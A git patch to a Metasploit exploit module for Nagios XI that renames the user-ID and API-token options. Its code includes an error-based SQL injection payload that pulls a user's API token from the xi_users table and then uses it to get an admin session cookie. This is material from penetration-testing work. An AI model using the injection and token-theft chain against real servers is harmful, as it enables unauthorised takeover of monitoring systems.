From 3e8cdd1f36e007939b44eb6ab01862c4db36f2b0 Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 30 Nov 2016 14:10:10 -0600 Subject: [PATCH] Polish up USER_ID and API_TOKEN options --- .../linux/http/nagios_xi_chained_rce.rb | 24 +++++++++++-------- 1 file changed, 14 insertions(+), 10 deletions(-) diff --git a/modules/exploits/linux/http/nagios_xi_chained_rce.rb b/modules/exploits/linux/http/nagios_xi_chained_rce.rb index 1dc893f9f2..129e62ffa1 100644 --- a/modules/exploits/linux/http/nagios_xi_chained_rce.rb +++ b/modules/exploits/linux/http/nagios_xi_chained_rce.rb @@ -44,10 +44,11 @@ class MetasploitModule < Msf::Exploit::Remote 'LHOST' => Rex::Socket.source_address } )) + register_options([ - OptInt.new('USERID', [ true, 'User ID in the database to target', 1 ]), - OptString.new('APITOKEN', [ false, 'If an API Token was already stolen, skip the sqli', '8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6gm' ]) - ], self.class) + OptInt.new('USER_ID', [true, 'User ID in the database to target', 1]), + OptString.new('API_TOKEN', [false, 'If an API token was already stolen, skip the SQLi']) + ]) end def check @@ -73,8 +74,8 @@ class MetasploitModule < Msf::Exploit::Remote fail_with(Failure::NotVulnerable, 'Vulnerable version not found! punt!') end - unless datastore['APITOKEN'].empty? - @api_token = datastore['APITOKEN'] + if datastore['API_TOKEN'] + @api_token = datastore['API_TOKEN'] else print_status('Getting API token') get_api_token @@ -125,15 +126,17 @@ class MetasploitModule < Msf::Exploit::Remote 'vars_get' => { 'mode' => 'resolve', 'host' => '\'AND(SELECT 1 FROM(SELECT COUNT(*),CONCAT((' \ - "SELECT backend_ticket FROM xi_users WHERE user_id=#{datastore['USERID']}" \ + "SELECT backend_ticket FROM xi_users WHERE user_id=#{datastore['USER_ID']}" \ '),FLOOR(RAND(0)*2))x ' \ 'FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- ' } ) + + # default admin token is shorter, ie 27o3b7mu1 shortened to 27o3b7mu + # any other user has a longer token, but we cant strip the last char off. + # example: 8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6g if res && res.body =~ /Duplicate entry '(.*?).'/ - if $1.length > 8 # default admin token is shorter, ie 27o3b7mu1 shortened to 27o3b7mu - # any other user has a longer token, but we cant strip the last char off. - # example: 8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6g + if $1.length > 8 res.body =~ /Duplicate entry '(.*?)'/ end @api_token = $1 @@ -148,10 +151,11 @@ class MetasploitModule < Msf::Exploit::Remote 'method' => 'GET', 'uri' => '/nagiosxi/rr.php', 'vars_get' => { - 'uid' => "#{datastore['USERID']}-#{Rex::Text.rand_text_alpha(8)}-" + + 'uid' => "#{datastore['USER_ID']}-#{Rex::Text.rand_text_alpha(8)}-" + Digest::MD5.hexdigest(@api_token) } ) + if res && (@admin_cookie = res.get_cookies.split('; ').last) vprint_good("Admin cookie: #{@admin_cookie}") get_csrf_token(res.body)